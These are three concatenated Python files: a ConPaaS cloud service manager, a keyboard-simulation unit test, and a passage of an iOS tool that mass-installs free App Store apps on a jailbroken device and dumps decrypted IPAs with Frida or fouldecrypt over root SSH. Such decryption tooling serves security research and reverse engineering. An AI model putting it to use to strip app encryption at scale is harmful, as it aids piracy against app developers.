CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# TODO: as this file was created from a BLUEPRINT file,
# you may want to change ports, paths and/or methods (e.g. for hub)
# to meet your specific service/server needs
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.controller import Controller
from conpaas.core.manager import BaseManager
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.core.log import create_logger
from conpaas.services.blueprint.agent import client
class BluePrintManager(BaseManager):
"""Manager class with the following exposed methods:
startup() -- POST
shutdown() -- POST
add_nodes(count) -- POST
remove_nodes(count) -- POST
list_nodes() -- GET
get_service_info() -- GET
get_node_info(serviceNodeId) -- GET
"""
# Manager states
S_INIT = 'INIT' # manager initialized but not yet started
S_PROLOGUE = 'PROLOGUE' # manager is starting up
S_RUNNING = 'RUNNING' # manager is running
S_ADAPTING = 'ADAPTING' # manager is in a transient state - frontend will
# keep polling until manager out of transient state
S_EPILOGUE = 'EPILOGUE' # manager is shutting down
S_STOPPED = 'STOPPED' # manager stopped
S_ERROR = 'ERROR' # manager is in error state
# String template for error messages returned when performing actions in
# the wrong state
WRONG_STATE_MSG = "ERROR: cannot perform %(action)s in state %(curstate)s"
# String template for error messages returned when a required argument is
# missing
REQUIRED_ARG_MSG = "ERROR: %(arg)s is a required argument"
# String template for debugging messages logged on nodes creation
ACTION_REQUESTING_NODES = "requesting %(count)s nodes in %(action)s"
AGENT_PORT = 5555
def __init__(self, config_parser, **kwargs):
"""Initialize a BluePrint Manager.
'config_parser' represents the manager config file.
**kwargs holds anything that can't be sent in config_parser."""
BaseManager.__init__(self, config_parser)
self.nodes = []
# Setup the clouds' controller
self.controller.generate_context('blueprint')
self.state = self.S_INIT
@expose('POST')
def startup(self, kwargs):
"""Start the BluePrint service"""
self.logger.info('Manager starting up')
# Starting up the service makes sense only in the INIT or STOPPED
# states
if self.state != self.S_INIT and self.state != self.S_STOPPED:
vals = { 'curstate': self.state, 'action': 'startup' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_PROLOGUE
Thread(target=self._do_startup, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_startup(self):
"""Start up the service. The first node will be an agent running a
BluePrint Hub and a BluePrint Node."""
vals = { 'action': '_do_startup', 'count': 1 }
self.logger.debug(self.ACTION_REQUESTING_NODES % vals)
try:
nodes = self.controller.create_nodes(1,
client.check_agent_process, self.AGENT_PORT)
# Extend the nodes list with the newly created one
self.nodes += nodes
self.state = self.S_RUNNING
except Exception, err:
self.logger.exception('_do_startup: Failed to start agent: %s' % err)
self.state = self.S_ERROR
@expose('POST')
def shutdown(self, kwargs):
"""Switch to EPILOGUE and call a thread to delete all nodes"""
# Shutdown only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'shutdown' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
self.state = self.S_EPILOGUE
Thread(target=self._do_shutdown, args=[]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_shutdown(self):
"""Delete all nodes and switch to status STOPPED"""
self.controller.delete_nodes(self.nodes)
self.nodes = [] # Not only delete the nodes, but clear the list too
self.state = self.S_STOPPED
def __check_count_in_args(self, kwargs):
"""Return 'count' if all is good. HttpErrorResponse otherwise."""
# The frontend sends count under 'node'.
if 'node' in kwargs:
kwargs['count'] = kwargs['node']
if not 'count' in kwargs:
return HttpErrorResponse(self.REQUIRED_ARG_MSG % { 'arg': 'count' })
if not isinstance(kwargs['count'], int):
return HttpErrorResponse(
"ERROR: Expected an integer value for 'count'")
return int(kwargs['count'])
@expose('POST')
def add_nodes(self, kwargs):
"""Add kwargs['count'] nodes to this deployment"""
self.controller.update_context(dict(STRING='blueprint'))
# Adding nodes makes sense only in the RUNNING state
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'add_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_add_nodes(self, count):
"""Add 'count' BluePrint Nodes to this deployment"""
node_instances = self.controller.create_nodes(count,
client.check_agent_process, self.AGENT_PORT)
# Startup agents
for node in node_instances:
client.create_node(node.ip, self.AGENT_PORT)
self.nodes += node_instances
self.state = self.S_RUNNING
@expose('POST')
def remove_nodes(self, kwargs):
"""Remove kwargs['count'] nodes from this deployment"""
# Removing nodes only if RUNNING
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'remove_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
# Ensure 'count' is valid
count_or_err = self.__check_count_in_args(kwargs)
if isinstance(count_or_err, HttpErrorResponse):
return count_or_err
count = count_or_err
if count > len(self.nodes) - 1:
return HttpErrorResponse("ERROR: Cannot remove so many nodes")
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[count]).start()
return HttpJsonResponse({ 'state': self.state })
def _do_remove_nodes(self, count):
"""Remove 'count' nodes, starting from the end of the list. This way
the BluePrint Hub gets removed last."""
for _ in range(count):
node = self.nodes.pop()
self.logger.info("Removing node with IP %s" % node.ip)
self.controller.delete_nodes([ node ])
self.state = self.S_RUNNING
@expose('GET')
def list_nodes(self, kwargs):
"""Return a list of running nodes"""
if self.state != self.S_RUNNING:
vals = { 'curstate': self.state, 'action': 'list_nodes' }
return HttpErrorResponse(self.WRONG_STATE_MSG % vals)
node_ids = [node.id for node in self.nodes ]
return HttpJsonResponse({
'node': node_ids
})
@expose('GET')
def get_service_info(self, kwargs):
"""Return the service state and type"""
return HttpJsonResponse({'state': self.state, 'type': 'blueprint'})
@expose('GET')
def get_node_info(self, kwargs):
"""Return information about the node identified by the given
kwargs['serviceNodeId']"""
# serviceNodeId is a required parameter
if 'serviceNodeId' not in kwargs:
vals = { 'arg': 'serviceNodeId' }
return HttpErrorResponse(self.REQUIRED_ARG_MSG % vals)
serviceNodeId = kwargs.pop('serviceNodeId')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse(
'ERROR: Cannot find node with serviceNode=%s' % serviceNodeId)
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip
}
})
@expose('GET')
def test(self, kwargs):
"""Return test messages from all the agents"""
msgsum = ''
for node in self.nodes:
msgsum += client.test(node.ip, self.AGENT_PORT)['msg'] + '\n'
return HttpJsonResponse({'msgs': msgsum})
|
checkTagTest.py
|
from time import sleep
import unittest
import tracemalloc
import threading
from pynput.keyboard import Key, Controller
import os
from checkTag import CheckTag
os.system("clear")
tracemalloc.start()
# Incorrect, Incorrect, Correct, Incorrect len, Correct, Correct test-tag
tagList = ["67523475", "876348574", "952224470", "7978497850", "537059654", "101051865"]
keyboard = Controller()
def sendKeys():
for tag in tagList:
sleep(10)
keyboard.type(tag)
keyboard.press(Key.enter)
keyboard.release(Key.enter)
class Test(unittest.TestCase):
def test_checkTag(self):
threading.Thread(target=lambda: sendKeys()).start()
CheckTag()
if __name__ == '__main__':
unittest.main()
|
appledl.py
|
# stdlib
import os
import pathlib
import shutil
import signal
import subprocess
import tempfile
import threading
import time
# external
from cachetools import TTLCache # dict with timout
from scp import SCPClient # ssh copy directories
from tqdm import tqdm # progress bar
from zxtouch import touchtypes, toasttypes
from zxtouch.client import zxtouch # simulate touch input on device
import frida # run scripts on device
import paramiko # ssh
# internal
import ipadumper
from ipadumper.utils import get_logger, itunes_info, progress_helper, free_port
class AppleDL:
'''
Downloader instance for a single device
On inititalization two iproxy process are started: one for ssh and one for zxtouch
Then a ssh and a frida connection will get established and the template images are copied with scp to the device
'''
def __init__(
self,
udid=None,
device_address='localhost',
ssh_key_filename='iphone',
local_ssh_port=0,
local_zxtouch_port=0,
image_base_path_device='/private/var/mobile/Library/ZXTouch/scripts/appstoredownload.bdl',
image_base_path_local=os.path.join(os.path.dirname(ipadumper.__file__), 'appstore_images'),
theme='dark',
lang='en',
timeout=15,
log_level='info',
init=True,
):
self.udid = udid
self.device_address = device_address
self.ssh_key_filename = ssh_key_filename
self.local_ssh_port = local_ssh_port
self.local_zxtouch_port = local_zxtouch_port
self.image_base_path_device = image_base_path_device
self.image_base_path_local = image_base_path_local
self.theme = theme
self.lang = lang
self.timeout = timeout
self.log_level = log_level
self.log = get_logger(log_level, name=__name__)
signal.signal(signal.SIGINT, self.__signal_handler)
signal.signal(signal.SIGTERM, self.__signal_handler)
self.running = True
self.processes = []
# self.file_dict = {}
self.installed_cached = TTLCache(maxsize=1, ttl=2)
self.log.debug('Logging is set to debug')
self.init_frida_done = False
self.init_ssh_done = False
self.init_zxtouch_done = False
self.init_images_done = False
if not self.device_connected():
self.cleanup()
elif init is True:
if not self.init_all():
self.cleanup()
def __del__(self):
if self.running:
self.cleanup()
def __signal_handler(self, signum, frame):
self.log.info('Received exit signal')
self.cleanup()
def cleanup(self):
self.log.debug('Clean up...')
self.running = False
self.log.info('Disconnecting from device')
try:
self.finished.set()
self.device.disconnect()
self.sshclient.close()
except AttributeError:
pass
# close all processes
for idx, p in enumerate(self.processes, start=1):
self.log.debug(f'Stopping process {idx}/{len(self.processes)}')
p.terminate()
p.wait()
# threads
for t in threading.enumerate():
if t.name != 'MainThread' and t.is_alive():
self.log.debug(f'Running thread: {t.name}')
self.log.debug('Clean up done')
def init_all(self):
'''
return success
'''
if not self.init_frida() or not self.init_ssh() or not self.init_zxtouch or not self.init_images():
return False
return True
def device_connected(self):
'''
return True if a device is available else return False
'''
if self.udid is None:
returncode = subprocess.call(
['ideviceinfo'], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if returncode == 0:
return True
else:
self.log.error('No device found')
return False
else:
returncode = subprocess.call(
['ideviceinfo', '--udid', self.udid], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if returncode == 0:
return True
else:
self.log.error(f'Device {self.udid} not found')
return False
def init_frida(self):
'''
set frida device
return success
'''
try:
if self.udid is None:
self.frida_device = frida.get_usb_device()
else:
self.frida_device = frida.get_device(self.udid)
except frida.InvalidArgumentError:
self.log.error('No Frida USB device found')
return False
self.init_frida_done = True
return True
def init_ssh(self):
'''
Initializing SSH connection to device
return success
'''
# start iproxy for SSH
if self.local_ssh_port == 0:
self.local_ssh_port = free_port()
if self.udid is None:
self.__run_cmd(['iproxy', str(self.local_ssh_port), '22'])
else:
self.__run_cmd(['iproxy', '--udid', self.udid, str(self.local_ssh_port), '22'])
time.sleep(0.1)
self.log.debug('Connecting to device via SSH')
# pkey = paramiko.Ed25519Key.from_private_key_file(self.ssh_key_filename)
self.sshclient = paramiko.SSHClient()
# client.load_system_host_keys()
self.sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
self.sshclient.connect(
'localhost', port=self.local_ssh_port, username='root', key_filename=self.ssh_key_filename
)
except FileNotFoundError:
self.log.error(f'Could not find ssh keyfile "{self.ssh_key_filename}"')
return False
except (EOFError, ConnectionResetError, paramiko.ssh_exception.SSHException):
self.log.error('Could not connect to establish SSH connection')
return False
self.init_ssh_done = True
return True
def init_zxtouch(self):
# start iproxy for zxtouch
if self.local_zxtouch_port == 0:
self.local_zxtouch_port = free_port()
if self.udid is None:
self.__run_cmd(['iproxy', str(self.local_zxtouch_port), '6000'])
else:
self.__run_cmd(['iproxy', '--udid', self.udid, str(self.local_zxtouch_port), '6000'])
self.log.info(f'Connecting to device at {self.device_address}:{self.local_zxtouch_port}')
try:
self.device = zxtouch(self.device_address, port=self.local_zxtouch_port)
except ConnectionRefusedError:
self.log.error('Error connecting to zxtouch on device. Make sure iproxy is running')
self.cleanup()
return False
self.init_zxtouch_done = True
return True
def init_images(self):
'''
Copy template images from local folder to device
return success
'''
# check directory structure
try:
_, dirnames_themes, _ = next(os.walk(self.image_base_path_local))
except StopIteration:
self.log.error(f'Image directory not found: {self.image_base_path_local}')
return False
theme_path = os.path.join(self.image_base_path_local, self.theme)
lang_path = os.path.join(self.image_base_path_local, self.theme, self.lang)
if self.theme in dirnames_themes:
_, dirnames_langs, filenames_theme = next(os.walk(theme_path))
if self.lang not in dirnames_langs:
self.log.error(f'Language directory "{self.lang}" not found in {theme_path}')
return False
else:
self.log.error(f'Theme directory "{self.theme}" not found in {self.image_base_path_local}')
return False
# check if all images exist locally
image_names_unlabeled = ['cloud.png']
image_names_labeled = ['dissallow.png', 'get.png', 'install.png']
_, _, filenames_lang = next(os.walk(lang_path))
for image_name_labeled in image_names_labeled:
if image_name_labeled not in filenames_lang:
self.log.error(f'Image {image_name_labeled} not found in {lang_path}')
return False
for image_name_unlabeled in image_names_unlabeled:
if image_name_unlabeled not in filenames_theme:
self.log.error(f'Image {image_name_unlabeled} not found in {theme_path}')
return False
# transfer images over SSH
try:
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout) as scp:
for labeled_img in image_names_labeled:
scp.put(os.path.join(lang_path, labeled_img), self.image_base_path_device)
for unlabeled_img in image_names_unlabeled:
unlabeled_img_path = os.path.join(theme_path, unlabeled_img)
scp.put(unlabeled_img_path, self.image_base_path_device)
except OSError:
self.log.error('Could not copy template images to device')
return False
self.init_images_done = True
return True
def ssh_cmd(self, cmd):
'''
execute command via ssh and iproxy
return exitcode, stdout, stderr
'''
if not self.init_ssh_done:
if not self.init_ssh():
return 1, '', ''
self.log.debug(f'Run ssh cmd: {cmd}')
stdin, stdout, stderr = self.sshclient.exec_command(cmd)
exitcode = stdout.channel.recv_exit_status()
out = ''
err = ''
for line in stdout:
out += line
for line in stderr:
err += line
if exitcode != 0 or out != '' or err != '':
self.log.debug(f'Exitcode: {exitcode}\nSTDOUT:\n{out}STDERR:\n{err}DONE')
return exitcode, out, err
def __log_cmd(self, pipe, err):
with pipe:
for line in iter(pipe.readline, b''): # b'\n'-separated lines
if err is True:
self.log.warning(f"got err line from subprocess: {line.decode('utf-8').rstrip()}")
else:
self.log.info(f"got out line from subprocess: {line.decode('utf-8').rstrip()}")
if err is True:
self.log.debug('Terminating stderr output thread')
else:
self.log.debug('Terminating stdout output thread')
def __run_cmd(self, cmd):
'''
Start external program and log stdout + stderr
'''
cmd_str = ' '.join(cmd)
self.log.info(f'Starting: {cmd_str}')
p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# start logging threads: one for stderr and one for stdout
t_out = threading.Thread(target=self.__log_cmd, args=(p.stdout, False))
t_err = threading.Thread(target=self.__log_cmd, args=(p.stderr, True))
self.processes.append(p)
# t_out.daemon = True
# t_err.daemon = True
t_out.name = ' '.join(cmd[:3]) # + '-out'
t_err.name = ' '.join(cmd[:3]) # + '-err'
t_out.start()
t_err.start()
def __is_installed(self, bundleId):
'''
return version code if app is installed else return False
'''
try:
out = self.installed_cached[0]
except KeyError:
if self.udid is None:
out = subprocess.check_output(['ideviceinstaller', '-l'], encoding='utf-8')
else:
out = subprocess.check_output(['ideviceinstaller', '--udid', self.udid, '-l'], encoding='utf-8')
# cache output
self.installed_cached[0] = out
for line in out.splitlines()[1:]:
CFBundleIdentifier, CFBundleVersion, CFBundleDisplayName = line.split(', ')
if CFBundleIdentifier == bundleId:
version = CFBundleVersion.strip('"')
displayName = CFBundleDisplayName.strip('"')
self.log.debug(f'Found installed app {bundleId}: {version} ({displayName})')
return version
return False
def __match_image(self, image_name, acceptable_value=0.9, max_try_times=1, scaleRation=1):
'''
get image from image_dir_device + image_name
if matching return x,y coordinates from the middle
else return False
'''
path = f'{self.image_base_path_device}/{image_name}'
result_tuple = self.device.image_match(path, acceptable_value, max_try_times, scaleRation)
if result_tuple[0] is not True:
raise Exception(f'Error while matching {image_name}: {result_tuple[1]}')
else:
result_dict = result_tuple[1]
width = int(float(result_dict['width']))
height = int(float(result_dict['height']))
x = int(float(result_dict['x']))
y = int(float(result_dict['y']))
if width != 0 and height != 0:
middleX = x + (width // 2)
middleY = y + (height // 2)
self.log.debug(
f'Matched {image_name}: x,y: {x},{y}\t size: {width},{height}\t middle: {middleX},{middleY}'
)
return middleX, middleY
else:
self.log.debug(f'Match failed. Cannot find {image_name} on screen.')
return False
def __tap(self, xy, message=''):
'''
Simulate touch input (single tap) and show toast message on device
'''
x, y = xy
self.log.debug(f'Tapping {xy} {message}')
self.device.show_toast(toasttypes.TOAST_WARNING, f'{message} ({x},{y})', 1.5)
self.device.touch(touchtypes.TOUCH_DOWN, 1, x, y)
time.sleep(0.1)
self.device.touch(touchtypes.TOUCH_UP, 1, x, y)
def __wake_up_device(self):
'''
Normally not needed.
Install (uiopen) wakes up device too
'''
self.log.info('Unlocking device if not awake..')
self.ssh_cmd('activator send libactivator.system.homebutton')
time.sleep(0.5)
self.ssh_cmd('activator send libactivator.system.homebutton')
time.sleep(0.5)
def dump_fouldecrypt(self, target, output, timeout=120, disable_progress=False, copy=True):
'''
Dump IPA by using FoulDecrypt
When copy is False, the app directory on the device is overwritten which is faster than copying everything
Return success
'''
if not self.init_ssh_done:
if not self.init_ssh():
return False
self.log.debug(f'{target}: Start dumping with FoulDecrypt.')
# get path of app
apps_dir = '/private/var/containers/Bundle/Application/'
cmd = f'grep --only-matching {target} {apps_dir}*/iTunesMetadata.plist'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'grep returned {ret} {stderr}')
return False
target_dir = stdout.split('/iTunesMetadata.plist ')[0].split(' ')[-1]
# get app directory name
cmd = f'ls -d {target_dir}/*/'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'ls -d returned {ret} {stderr}')
return False
app_dir = stdout.strip().rstrip('/').split('/')[-1]
if not app_dir.endswith('.app'):
self.log.error(f'App directory does not end with .app: {app_dir}')
return False
app_bin = app_dir[:-4]
if copy is True:
orig_target_dir = target_dir
target_dir = target_dir + '_tmp'
cmd = f'cp -r {orig_target_dir} {target_dir}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'cp -r returned {ret} {stderr}')
return False
bin_path = target_dir + '/' + app_dir + '/' + app_bin
# decrypt binary and replace
self.log.debug(f'{target}: Decrypting binary with fouldecrypt')
cmd = f'/usr/local/bin/fouldecrypt -v {bin_path} {bin_path}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'fouldecrypt returned {ret} {stderr}')
return False
# prepare for zipping, create Payload folder
cmd = f'mkdir {target_dir}/Payload'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'mkdir returned {ret} {stderr}')
return False
cmd = f'mv {target_dir}/{app_dir} {target_dir}/Payload'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'mv returned {ret} {stderr}')
return False
self.log.debug(f'{target}: Set access and modified date to 0 for reproducible zip files')
cmd = f'find {target_dir} -exec touch -m -d "1/1/1980" {{}} +'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'find+touch returned {ret} {stderr}')
return False
# zip
self.log.debug(f'{target}: Creating zip')
cmd = f'cd {target_dir} && zip -qrX out.zip . -i "Payload/*"'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'zip returned {ret} {stderr}')
return False
# transfer out.zip
bar_fmt = '{desc:20.20} {percentage:3.0f}%|{bar:20}{r_bar}'
self.log.debug(f'{target}: Start transfer. {output}')
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(target_dir + '/out.zip', output)
if copy is True:
self.log.debug('Clean up temp directory on device')
cmd = f'rm -rf {target_dir}'
ret, stdout, stderr = self.ssh_cmd(cmd)
if ret != 0:
self.log.error(f'rm returned {ret} {stderr}')
return False
return True
def dump_frida(
self,
target,
output,
timeout=120,
disable_progress=False,
dumpjs_path=os.path.join(os.path.dirname(ipadumper.__file__), 'dump.js'),
):
'''
target: Bundle identifier of the target app
output: Specify name of the decrypted IPA
dumpjs_path: path to dump.js
timeout: timeout in for dump to finish
disable_progress: disable progress bars
return success
partly copied from
https://github.com/AloneMonkey/frida-ios-dump/blob/9e75f6bca34f649aa6fcbafe464eca5d624784d6/dump.py
MIT License
Copyright (c) 2017 Alone_Monkey
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
if not self.init_ssh_done:
if not self.init_ssh():
return False
if not self.init_frida_done:
if not self.init_frida():
return False
bar_fmt = '{desc:20.20} {percentage:3.0f}%|{bar:20}{r_bar}'
temp_dir = tempfile.mkdtemp()
self.log.debug(f'{target}: Start dumping with Frida. Temp dir: {temp_dir}')
payload_dir = os.path.join(temp_dir, 'Payload')
os.mkdir(payload_dir)
self.finished = threading.Event()
file_dict = {}
def generate_ipa():
self.log.debug(f'{target}: Generate ipa')
for key, value in file_dict.items():
from_dir = os.path.join(payload_dir, key)
to_dir = os.path.join(payload_dir, file_dict['app'], value)
if key != 'app':
# try:
# cmp = filecmp.cmp(from_dir, to_dir)
# except FileNotFoundError:
# print(f'new: {from_dir}')
# print(f'cmp is {cmp}, move {key} from {from_dir} to {to_dir}')
shutil.move(from_dir, to_dir)
self.log.debug(f'{target}: Set access and modified date to 0 for reproducible zip files')
for f in pathlib.Path(temp_dir).glob('**/*'):
os.utime(f, (0, 0))
zip_args = ('zip', '-qrX', os.path.join(os.getcwd(), output), 'Payload')
self.log.debug(f'{target}: Run zip: {zip_args}')
try:
subprocess.check_call(zip_args, cwd=temp_dir)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {zip_args} {str(err)}')
def on_message(message, data):
'''
callback function for dump messages
receives paths and copies them with scp
'''
t = threading.currentThread()
t.name = f'msg-{target}'
try:
payload = message['payload']
except KeyError:
self.log.warning(f'{target}: No payload in message')
self.log.debug(f'Message: {message}')
return
if 'info' in payload:
self.log.debug(f"{target}: {payload['info']}")
if 'warn' in payload:
self.log.warning(f"{target}: {payload['warn']}")
if 'dump' in payload:
index = payload['path'].find('.app/') + 5
file_dict[os.path.basename(payload['dump'])] = payload['path'][index:]
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(payload['dump'], payload_dir + '/')
chmod_dir = os.path.join(payload_dir, os.path.basename(payload['dump']))
chmod_args = ('chmod', '655', chmod_dir)
try:
subprocess.check_call(chmod_args)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {chmod_args} {str(err)}')
if 'app' in payload:
with tqdm(unit="B", unit_scale=True, miniters=1, bar_format=bar_fmt, disable=disable_progress) as t:
pr = progress_helper(t)
with SCPClient(self.sshclient.get_transport(), socket_timeout=self.timeout, progress=pr) as scp:
scp.get(payload['app'], payload_dir + '/', recursive=True)
chmod_dir = os.path.join(payload_dir, os.path.basename(payload['app']))
chmod_args = ('chmod', '755', chmod_dir)
try:
subprocess.check_call(chmod_args)
except subprocess.CalledProcessError as err:
self.log.error(f'{target}: {chmod_args} {str(err)}')
file_dict['app'] = os.path.basename(payload['app'])
if 'done' in payload:
self.finished.set()
self.log.debug(f'{target}: Opening app')
self.ssh_cmd(f'open {target}')
time.sleep(0.1)
# create frida session
apps = self.frida_device.enumerate_applications()
session = None
for app in apps:
if app.identifier == target:
if app.pid == 0:
self.log.error(f'{target}: Could not start app')
return
session = self.frida_device.attach(app.pid)
# run script
with open(dumpjs_path) as f:
jsfile = f.read()
script = session.create_script(jsfile)
script.on('message', on_message)
self.log.debug(f'{target}: Loading script')
script.load()
script.post('dump')
success = False
if self.finished.wait(timeout=timeout):
if self.running:
generate_ipa()
self.log.debug(f'{target}: Dumping finished. Clean up temp dir {temp_dir}')
success = True
else:
self.log.debug(f'{target}: Cancelling dump. Clean up temp dir {temp_dir}')
else:
self.log.error(f'{target}: Timeout of {timeout}s exceeded. Clean up temp dir {temp_dir}')
shutil.rmtree(temp_dir)
if session:
session.detach()
return success
def bulk_decrypt(self, itunes_ids, timeout_per_MiB=0.5, parallel=3, output_directory='ipa_output', country='us'):
'''
Installs apps, decrypts and uninstalls them
In parallel!
itunes_ids: list of int with the iTunes IDs
'''
if type(itunes_ids[0]) != int:
self.log.error('bulk_decrypt: list of int needed')
return False
total = len(itunes_ids)
wait_for_install = [] # apps that are currently downloading and installing
done = [] # apps that are uninstalled
waited_time = 0
while len(itunes_ids) > 0 or len(wait_for_install) > 0:
self.log.debug(f'Done {len(done)}/{total}, installing: {len(wait_for_install)}')
if len(itunes_ids) > 0 and len(wait_for_install) < parallel:
# install app
self.log.info(f'Installing, len: {len(wait_for_install)}')
itunes_id = itunes_ids.pop()
trackName, version, bundleId, fileSizeMiB, price, currency = itunes_info(
itunes_id, log_level=self.log_level, country=country
)
app = {'bundleId': bundleId, 'fileSizeMiB': fileSizeMiB, 'itunes_id': itunes_id, 'version': version}
if price != 0:
self.log.warning(f'{bundleId}: Skipping, app is not for free ({price} {currency})')
continue
if self.__is_installed(bundleId) is not False:
self.log.info(f'{bundleId}: Skipping, app already installed')
total -= 1
# subprocess.check_output(['ideviceinstaller', '--uninstall', bundleId])
continue
wait_for_install.append(app)
self.install(itunes_id)
self.log.info(f'{bundleId}: Waiting for download and installation to finish ({fileSizeMiB} MiB)')
else:
# check if an app installation has finished
# if yes then dump app else wait for an install to finish
# also check if a dump has finished. If yes then uninstall app
install_finished = False
to_download_size = 0
for app in wait_for_install:
if self.__is_installed(app['bundleId']) is not False:
# dump app
self.log.info(
f"{app['bundleId']}: Download and installation finished. Opening app and starting dump"
)
install_finished = True
waited_time = 0
# waited_time -= app['fileSizeMiB'] * timeout_per_MiB
# if waited_time < 0:
# waited_time = 0
wait_for_install.remove(app)
try:
os.mkdir(output_directory)
except FileExistsError:
pass
name = f"{app['itunes_id']}_{app['bundleId']}_{app['version']}.ipa"
output = os.path.join(output_directory, name)
timeout = self.timeout + app['fileSizeMiB'] // 2
disable_progress = False if self.log_level == 'debug' else True
self.dump_frida(app['bundleId'], output, timeout=timeout, disable_progress=disable_progress)
# uninstall app after dump
self.log.info(f"{app['bundleId']}: Uninstalling")
if self.udid is None:
subprocess.check_output(['ideviceinstaller', '--uninstall', app['bundleId']])
else:
subprocess.check_output(
['ideviceinstaller', '--udid', self.udid, '--uninstall', app['bundleId']]
)
done.append(app)
else:
# recalculate remaining download size
to_download_size += app['fileSizeMiB']
# wait for an app to finish installation
if install_finished is False:
self.log.debug(f'Need to download {to_download_size} MiB')
if waited_time > self.timeout + timeout_per_MiB * to_download_size:
self.log.error(
f'Timeout exceeded. Waited time: {waited_time}. Need to download: {to_download_size} MiB'
)
self.log.debug(f'Wait for install queue: {wait_for_install}')
return False
else:
waited_time += 1
time.sleep(1)
def install(self, itunes_id):
'''
Opens app in appstore on device and simulates touch input to download and installs the app.
If there is a cloud button then press that and done
Else if there is a load button, press that and confirm with install button.
return success
'''
if not self.init_images_done:
if not self.init_images():
return False
if not self.init_zxtouch_done:
if not self.init_zxtouch():
return False
# get rid of permission request popups
while True:
dissallow_xy = self.__match_image('dissallow.png')
if dissallow_xy is not False:
self.log.debug('Dissallow permission request')
self.__tap(dissallow_xy, message='dissallow')
time.sleep(0.1)
else:
break
self.ssh_cmd(f'uiopen https://apps.apple.com/de/app/id{str(itunes_id)}')
self.log.debug(f'ID {itunes_id}: Waiting for get or cloud button to appear')
dl_btn_wait_time = 0
while dl_btn_wait_time <= self.timeout:
dl_btn_wait_time += 1
time.sleep(1)
dl_btn_xy = self.__match_image('get.png')
if dl_btn_xy is False:
dl_btn_xy = self.__match_image('cloud.png')
if dl_btn_xy is False:
continue
else:
# tap and done
self.__tap(dl_btn_xy, 'cloud')
return True
else:
self.__tap(dl_btn_xy, 'get')
break
if dl_btn_wait_time > self.timeout:
self.log.warning(f'ID {itunes_id}: No download button found after {self.timeout}s')
return False
# tap and need to wait and confirm with install button
self.__tap(dl_btn_xy, 'load')
self.log.debug(f'ID {itunes_id}: Waiting for install button to appear')
